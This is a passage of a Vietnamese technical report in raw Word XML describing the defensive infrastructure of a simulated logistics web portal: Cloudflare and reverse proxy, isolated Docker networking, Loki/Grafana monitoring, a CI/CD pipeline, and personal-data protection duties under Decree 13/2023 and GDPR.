              <w:t xml:space="preserve">                direction TB</w:t>
              <w:br/>
              <w:t xml:space="preserve">                PROM["ilfreight_promtail (Log Shipper 3.0)&lt;br/&gt;Đọc socket: /var/run/docker.sock"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                LOKI[("ilfreight_loki (Log Storage 3.0)&lt;br/&gt;Cổng 3100 nội bộ&lt;br/&gt;TSDB &amp; Alert Rules")]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                GRAF["ilfreight_grafana (Dashboard 11.0)&lt;br/&gt;Cổng 3000 nội bộ&lt;br/&gt;8 Panels an ninh"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                AUTOHEAL["autoheal (Monitoring Daemon)&lt;br/&gt;Tự động phục hồi container lỗi"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
              <w:br/>
              <w:t xml:space="preserve">                PROM --&gt;|HTTP Push API| LOKI</w:t>
              <w:br/>
              <w:t xml:space="preserve">                GRAF --&gt;|Truy vấn LogQL| LOKI</w:t>
              <w:br/>
              <w:t xml:space="preserve">                AUTOHEAL -.-&gt;|Giám sát nhịp tim container| PROM</w:t>
              <w:br/>
              <w:t xml:space="preserve">            end</w:t>
              <w:br/>
              <w:t xml:space="preserve">        end</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        NPM["Nginx Proxy Manager (Edge Reverse Proxy)&lt;br/&gt;• Đặt tại biên máy chủ Production VPS&lt;br/&gt;• Mở cổng 80, 443 tiếp nhận từ Cloudflare&lt;br/&gt;• SSL Termination &amp; Cân bằng tải nội bộ"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
              <w:br/>
              <w:t xml:space="preserve">        WEB --&gt;|Định tuyến dịch vụ Web: Cổng 80| NPM</w:t>
              <w:br/>
              <w:t xml:space="preserve">        GRAF --&gt;|Định tuyến Dashboard: Cổng 3000| NPM</w:t>
              <w:br/>
              <w:t xml:space="preserve">    end</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    subgraph INTERNET["TẦNG 3: TẦNG BIÊN &amp; TRUY CẬP NGƯỜI DÙNG / INTERNET"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        direction TB</w:t>
              <w:br/>
              <w:t xml:space="preserve">        CF["Cloudflare Edge Network &amp; WAF&lt;br/&gt;• TLS 1.3 Full Strict Encryption&lt;br/&gt;• Che giấu IP gốc máy chủ VPS&lt;br/&gt;• inlaneweb.ecotools.online &amp; grafana.ecotools.online"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
              <w:br/>
              <w:t xml:space="preserve">        USER["Người dùng hợp pháp&lt;br/&gt;(Khách hàng / Kỹ sư On-Call)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ATTACKER["Kẻ tấn công tiềm tàng&lt;br/&gt;(SQLi / XSS / LFI)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
              <w:br/>
              <w:t xml:space="preserve">        CF --&gt;|Phục vụ lưu lượng HTTPS an toàn| USER</w:t>
              <w:br/>
              <w:t xml:space="preserve">        CF -.-&gt;|Chặn đứng tấn công WAF / Drop Payload| ATTACKER</w:t>
              <w:br/>
              <w:t xml:space="preserve">    end</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    GHA ==&gt;|Stage 4 CD: Điều phối qua SSH Ed25519| DOCKER_NET</w:t>
              <w:br/>
              <w:t xml:space="preserve">    GHCR -.-&gt;|Kéo image Production sạch| WORKLOAD</w:t>
              <w:br/>
              <w:t xml:space="preserve">    NPM ==&gt;|Origin Traffic: Cổng 80, 443| CF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1.2. Phân tích chi tiết các phân hệ hạ tầng và nguyên lý vận hành</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kiến trúc hạ tầng được tổ chức thành 4 phân hệ chính hoạt động đồng bộ:</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Phân hệ biên và định tuyến an ninh (Edge &amp; Reverse Proxy Layer):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mạng biên Cloudflare:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đóng vai trò là tuyến phòng thủ đầu tiên. Cloudflare tiếp nhận toàn bộ lưu lượng truy cập từ Internet vào hai tên miền chính thức:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cổng dịch vụ logistics: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>https://inlaneweb.ecotools.online</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Cổng điều khiển an ninh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>https://grafana.ecotools.online</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Toàn bộ kết nối bên ngoài bắt buộc sử dụng giao thức HTTPS với chuẩn mã hóa TLS 1.3 Full Strict. Cloudflare che giấu hoàn toàn địa chỉ IP thực của máy chủ VPS, đồng thời kích hoạt bộ lọc WAF và chống tấn công từ chối dịch vụ (DDoS) ở tầng mạng và tầng ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nginx Proxy Manager (NPM):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Là thành phần Reverse Proxy đặt tại máy chủ VPS, chỉ mở 2 cổng công khai duy nhất </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để nhận lưu lượng đã được xác thực từ Cloudflare. NPM thực hiện giải mã SSL và điều hướng lưu lượng vào các container tương ứng trong mạng nội bộ Docker dựa theo tên miền con (Virtual Host Routing).</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Phân hệ mạng nội bộ và cách ly tài nguyên (Docker Isolated Network `inlaneweb_net`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Toàn bộ các dịch vụ container trên VPS được kết nối thông qua một mạng cầu nối duy nhất có tên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Chính sách đóng cổng tuyệt đối (No Host Port Exposure):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cổng kết nối cơ sở dữ liệu MariaDB (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>), cổng nhận log của Loki (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và cổng quản trị Grafana (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) tuyệt đối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>không ánh xạ ra ngoài máy chủ VPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Chúng chỉ có thể giao tiếp với nhau qua DNS nội bộ của Docker trong mạng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb_net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, triệt tiêu hoàn toàn nguy cơ quét cổng hoặc tấn công brute-force từ Internet.</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Hai khối chức năng độc lập (Dual-Track Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khối Ứng dụng nghiệp vụ (Workload - `docker-compose.prod.yml`):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gồm máy chủ web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Apache 2.4, PHP 8.2) và cơ sở dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MariaDB 10.11 LTS). CSDL sử dụng Docker Named Volume </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>db_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> gắn vào </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/var/lib/mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để đảm bảo dữ liệu được lưu trữ độc lập và không bao giờ bị mất khi container web/db được cập nhật hoặc khởi động lại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Khối Nền tảng quan sát tập trung (Observability - `docker-compose.monitoring.yml`):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vận hành độc lập 24/7 gồm Promtail 3.0, Grafana Loki 3.0, Grafana 11.0 và Autoheal daemon. Khối này đọc log phi xâm lấn qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và tự động kích hoạt khởi động lại dịch vụ nếu web bị treo hoặc bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân hệ điều khiển CI/CD và chuyển giao tự động (CI/CD Control Plane):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kết nối máy trạm của lập trình viên với máy ảo GitHub Actions Runner qua các cổng kiểm soát tự động 4 Stage (Policy Guard, SAST SonarQube &amp; Semgrep, Build &amp; Smoke Test).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Runner đóng gói các Docker image sạch và đẩy lên kho lưu trữ GitHub Container Registry (GHCR). Tại Stage 4, Runner kết nối an toàn vào VPS qua SSH với cặp khóa mã hóa Ed25519 để chỉ thị máy chủ kéo image mới về triển khai mà không làm gián đoạn hạ tầng giám sát.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1.3. Khối ứng dụng nghiệp vụ InlaneWeb và phân loại dữ liệu cần bảo vệ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trên nền tảng hạ tầng bảo mật nêu trên, hệ thống triển khai khối tải làm việc nghiệp vụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>InlaneWeb Logistics Portal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ứng dụng mô phỏng cổng thông tin điều hành hàng hải và quản lý cảng biển. Trong chu trình vận hành, ứng dụng xử lý đồng thời luồng thông tin vận tải công khai và dữ liệu khách hàng riêng tư, đòi hỏi các biện pháp bảo vệ kỹ thuật nghiêm ngặt theo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghị định 13/2023/NĐ-CP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GDPR</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Hai nghiệp vụ cốt lõi xử lý dữ liệu cá nhân:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghiệp vụ 1 — Tra cứu và quản lý hành trình vận đơn hàng hải:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khách hàng tra cứu trạng thái vận chuyển (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /api/track.php?tracking=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và để lại phản hồi trao đổi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>). Dữ liệu cần bảo vệ gồm mã vận đơn, hành trình bốc dỡ và định danh khách hàng (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>customer_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>). Cần phòng chống triệt để lỗ hổng tiêm mã SQL Injection theo Điều 9 Khoản 2 Nghị định 13/2023/NĐ-CP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghiệp vụ 2 — Xác thực định danh người dùng và cấp phát mã API:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Người dùng và đối tác đăng nhập (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>POST /login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) để nhận phiên làm việc và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>api_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Dữ liệu cần bảo vệ gồm tài khoản, mật khẩu, email và khóa API. Bắt buộc áp dụng thuật toán băm an toàn Bcrypt (Cost 12), cấm lưu trữ plaintext theo Điều 13 Khoản 2 Nghị định 13/2023/NĐ-CP và Article 25 GDPR.</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Cấu trúc thực thể cơ sở dữ liệu (ERD):</w:t>
      </w:r>
    </w:p>
    <w:p>
